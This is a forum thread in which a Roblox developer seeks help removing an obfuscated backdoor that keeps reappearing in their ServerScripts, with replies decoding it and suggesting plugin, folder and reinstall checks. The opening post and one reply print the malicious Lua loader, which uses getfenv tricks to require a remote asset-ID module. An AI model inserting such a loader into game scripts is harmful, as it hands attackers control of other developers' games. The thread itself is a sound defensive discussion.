Unknown Pieces of code appearing in my studio scripts

So I have already made a post on it before but the peoples help was not enough to clear my virus.The people said to remove all plugins and did that that did not help.

Code -

if require == print then require = print("nice try");print("nice try") end LOX = 4755747611; L0X = 67877778; local b = getfenv()["\76\79\88"] + getfenv()["\76\48\88"] getfenv()['\114\101\113\117\105\114\101'](b)["\77\111\100\101\108\72\101\108\112\101\114"]()

I haven’t used a free model in my game.But the problem is when I type some code in the script it lags soo much.

And you won’t believe the code randomly pops out.

This is not a recording lag this is the lag that appears when I try to remove that code.
This video as very less lag compared to the real lag.(Mostly because of recording quality)

Many may think I haven’t got any new information and this is the same information.

But no I found many more things.

  • Even if I remove the code the next time I open studio the code code will be there at the end
  • This code only appears only in ServerScript. It doesn’t appear in neither on the LocalScripts nor on the ModuleScript's.
  • After this I did something i copied to asset Id that appeared in the Output.

help pls.

As you can see the Item was deleted and the User is banned too.

  • I deleted almost every free model that was in my inventory too.

Now tell me how can I remove the code from appearing?

  • And also imagine someone typing /console to see the Dev Console that would be scared by the amount of items in it.

  • And it is really hard to find a real error because of the number of errors that is popping Up.

1 Like

i really want this to be removed from my games also i get scripts named debounce and weld but a good thing is i have an anti-virus plugin that searches for it and deletes it but i can’t keep it like this forever

Virus/backdoor don’t only come from free models…they also can come from plugins. That Kohl’s Admin free model you showed was unofficial, so you likely have an unofficial plugin as well. Check your plugin’s source codes.

if require == print then
    require = print("nice try")
    print("nice try")

LOX = 4755747611
L0X = 67877778
local b = LOX + L0X

It requires this module:


which itself requires a now deleted module. Since it is deleted it’s just a truss part. Now the code is obfuscated, so I don’t know if it did anything else.

1 Like

It can be some backdoor plugins causing this issue. Disable all your plugins and check if the problem persists.

And you should try with a good anti virus plugin like [SCAN PLUGINS!] GameGuard Anti Virus V2 [ALPHA]

If you still can’t solve, revert the game’s version to a version in which this problem did not persist.

1 Like

This seems like a bad plugin, you should uninstall any sketchy plugins.

Just gonna put the obligatory warning that everyone’s put first:

CensoredDeveloper’s Kohls Admin is a known fake reupload. These Kohls Admin reuploads are common. The official Kohls Admin is by Scripth - Kohl's Admin Infinite - Roblox

You should also probably reinstall Studio, that generally can fix this kind of issue as I’ve run into it before and it can persist with the installed copy of ROBLOX Studio even after everything else is completely removed or disabled.

1 Like

To @HawDevelopment, @Techyfied, and others telling me to remove my plugins I only have zero plugin’s.

Next I am not using khol’s Admin I just wanted to paste the asset id of shown in the output to see what was the model.

@M_dal i have tried Un - Installing and Re- installing studio twice.


I haven’t published my game yet.The very creepy thing is that even if I open a new blank baseplate and reopen the file the script would pop up.

Have you tried the anti-virus called Game Guardian yet? I am asking because my friend also had a issue like this and he had said that he used an ati virus too but didnt work. Then I told him to use that one and then the virus from his game was removed.

That is very odd. I’ve never seen this kind of infectious script persist after numerous installs. Perhaps there’s a memory leak being abused?

This sounds like a problem that a ROBLOX Engineer would have to look into because the behaviour of infectious scripts persisting outside of one contained place is a common problem in and of itself. Given you’ve stated that you’ve reinstalled Studio twice, I can only assume this is a bug/issue being abused in ROBLOX Studio.

1 Like

The obfuscated script requires a not-for-sale module after looking at a constant dump.


This sounds like it could still be the work of a malicious plugin, and not necessarily one that even appears to be installed (it might not create a toolbar button). Have you checked that your plugins folders are actually really empty? On Windows, navigate to:

C:\Users<your username>\AppData\Local\Roblox

Inside this folder there is a “Plugins” directory which is local plugins–normally only ones you’ve authored–so if there is something in there you don’t recognize, it’s probably bad. There is also an “InstalledPlugins” directory, but I don’t think this is still used? There will also be folders with Roblox UserIds as the names (all numbers, all the accounts you’ve used with Studio), and there are “InstalledPlugins” folders inside those folders as well, and these are still used. You could try copying the contents out to a temporary place and try starting Studio with all of these folders empty. Studio will re-download plugins you had actually enabled, so your userid/InstalledPlugins folder will repopulate with anything Studio believes you have installed. That might at least narrow the suspects even if the problem is not resolved.



From the errors i see it must a free model because u removed all the plugins and still the problems exist